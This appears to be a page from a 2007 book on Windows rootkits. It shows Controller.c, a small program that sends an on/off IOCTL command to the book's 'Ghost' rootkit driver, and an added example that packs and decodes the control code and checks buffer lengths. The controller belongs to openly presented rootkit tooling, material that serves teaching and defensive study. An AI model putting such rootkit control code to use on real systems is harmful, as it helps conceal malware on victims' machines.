Controller.c


The file Controller.c accepts an ON or OFF command and sends either GHOST_ON or GHOST_OFF to the device found at GHOST_DEVICE_OPEN_NAME. These definitions have been added to the new file, IoManager.h. This new file can be included by any application that needs to communicate with the rootkit:

  // Controller
  // Copyright Ric Vieler, 2006
  // Send an on/off command to MyDeviceDriver
  #include <windows.h>
  #include <stdio.h>
  #include <string.h>   // _stricmp (the ISO-conforming name of stricmp)
  #include <io.h>
  #include "IoManager.h"

  int main(int argc, char *argv[])
  {
    HANDLE deviceHandle;
    GHOST_IOCTLDATA control = { 0 };
    ULONG status = 0;   // bytes returned by DeviceIoControl

    // Expect exactly one argument, "on" or "off" (case-insensitive)
    if ((argc < 2) ||
        ((_stricmp(argv[1], "on") != 0) && (_stricmp(argv[1], "off") != 0)))
    {
      printf("Use Controller on\n");
      printf("or  Controller off\n");
      return 1;
    }

    // Open the device object that the driver registered
    deviceHandle = CreateFile(GHOST_DEVICE_OPEN_NAME,
                              GENERIC_READ | GENERIC_WRITE,
                              0,
                              NULL,
                              OPEN_EXISTING,
                              FILE_ATTRIBUTE_NORMAL,
                              NULL);
    if (deviceHandle == INVALID_HANDLE_VALUE)
    {
      printf("Could not find MyDeviceDriver.\n");
      return 1;
    }

    // Translate the argument into the command value defined in IoManager.h
    if (_stricmp(argv[1], "on") == 0)
      control.command = GHOST_ON;
    else
      control.command = GHOST_OFF;

    // The same structure serves as input and output buffer
    if (DeviceIoControl(deviceHandle,
                        GHOST_ON_OFF_COMMAND,
                        &control,
                        sizeof(control),   // input
                        (PVOID)&control,
                        sizeof(control),   // output
                        &status,
                        NULL))
      printf("MyDeviceDriver %s.\n", control.command == GHOST_ON ? "on" : "off");
    else
      printf("DeviceIoControl failed.\n");

    CloseHandle(deviceHandle);
    return 0;
  }
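The page does not reproduce IoManager.h, so the following is an added example, not the book's code, of how a control code such as GHOST_ON_OFF_COMMAND is packed by the Windows CTL_CODE macro and of the buffer-length check a driver's IOCTL dispatch routine must make before reading the request that Controller.c sends. The CTL_CODE field layout and the FILE_DEVICE_UNKNOWN, METHOD_BUFFERED and FILE_*_ACCESS constants are the documented Windows values; the GHOST_* names, the function number 0x800, the GHOST_IOCTLDATA layout and the validate_ghost_request/decode_ioctl helpers are assumptions made for illustration. The block is portable C so it can be compiled on any platform.

```c
/* Added example (not from the book): packing and decoding an IOCTL control
 * code, plus the input-buffer checks a dispatch routine should perform.
 * GHOST_* names, function number 0x800 and the helper functions are assumed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Documented Windows constants (winioctl.h / ntddk.h). */
#define FILE_DEVICE_UNKNOWN 0x22
#define METHOD_BUFFERED     0
#define FILE_ANY_ACCESS     0
#define FILE_READ_ACCESS    0x0001
#define FILE_WRITE_ACCESS   0x0002

/* CTL_CODE packs DeviceType:16 | Access:2 | Function:12 | Method:2. */
#define CTL_CODE(DeviceType, Function, Method, Access) \
    (((uint32_t)(DeviceType) << 16) | ((uint32_t)(Access) << 14) | \
     ((uint32_t)(Function) << 2) | (uint32_t)(Method))

/* Assumed IoManager.h contents. Function numbers 0x000-0x7FF are reserved
 * for Microsoft, so 0x800 is the first slot a third-party driver may use. */
#define GHOST_ON_OFF_COMMAND \
    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define GHOST_OFF 0
#define GHOST_ON  1

typedef struct {
    uint32_t command;   /* GHOST_ON or GHOST_OFF */
} GHOST_IOCTLDATA;

typedef struct {
    uint32_t device_type;
    uint32_t access;
    uint32_t function;
    uint32_t method;
} IoctlFields;

/* Unpack a control code into its four fields (the inverse of CTL_CODE).
 * Useful when an unfamiliar IOCTL value shows up in a trace or a log. */
IoctlFields decode_ioctl(uint32_t code)
{
    IoctlFields f;
    f.device_type = (code >> 16) & 0xFFFF;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2)  & 0xFFF;
    f.method      = code & 0x3;
    return f;
}

enum { IOCTL_OK = 0, IOCTL_UNKNOWN_CODE = 1,
       IOCTL_INPUT_TOO_SMALL = 2, IOCTL_BAD_COMMAND = 3 };

/* Model of the checks a METHOD_BUFFERED dispatch routine should make before
 * acting on a request: the control code must be one it knows, the caller's
 * input buffer must be at least sizeof(GHOST_IOCTLDATA), and the command
 * value must be one of the defined ones. Returns 0 when acceptable. */
int validate_ghost_request(uint32_t code, const void *in_buf, size_t in_len)
{
    if (code != GHOST_ON_OFF_COMMAND)
        return IOCTL_UNKNOWN_CODE;
    if (in_buf == NULL || in_len < sizeof(GHOST_IOCTLDATA))
        return IOCTL_INPUT_TOO_SMALL;      /* never read past a short buffer */
    GHOST_IOCTLDATA data;
    memcpy(&data, in_buf, sizeof data);    /* work on a local copy */
    if (data.command != GHOST_ON && data.command != GHOST_OFF)
        return IOCTL_BAD_COMMAND;
    return IOCTL_OK;
}

int main(void)
{
    IoctlFields f = decode_ioctl(GHOST_ON_OFF_COMMAND);
    printf("GHOST_ON_OFF_COMMAND = 0x%08X (device 0x%X, function 0x%X, "
           "method %u, access %u)\n",
           (unsigned)GHOST_ON_OFF_COMMAND, (unsigned)f.device_type,
           (unsigned)f.function, (unsigned)f.method, (unsigned)f.access);

    GHOST_IOCTLDATA good = { GHOST_ON };   /* constructed well-formed request */
    uint8_t short_buf[2] = { 0 };          /* constructed truncated request */
    printf("well-formed request: %d\n",
           validate_ghost_request(GHOST_ON_OFF_COMMAND, &good, sizeof good));
    printf("truncated request:   %d\n",
           validate_ghost_request(GHOST_ON_OFF_COMMAND, short_buf, sizeof short_buf));
    return 0;
}
```

With these assumed values the control code packs to 0x222000, and the truncated two-byte request is rejected before any field is read; this is the length check Controller.c relies on the driver side to perform, since DeviceIoControl passes whatever buffer size the caller supplies.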

Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
Year: 2007
Pages: 229
Author: Ric Vieler
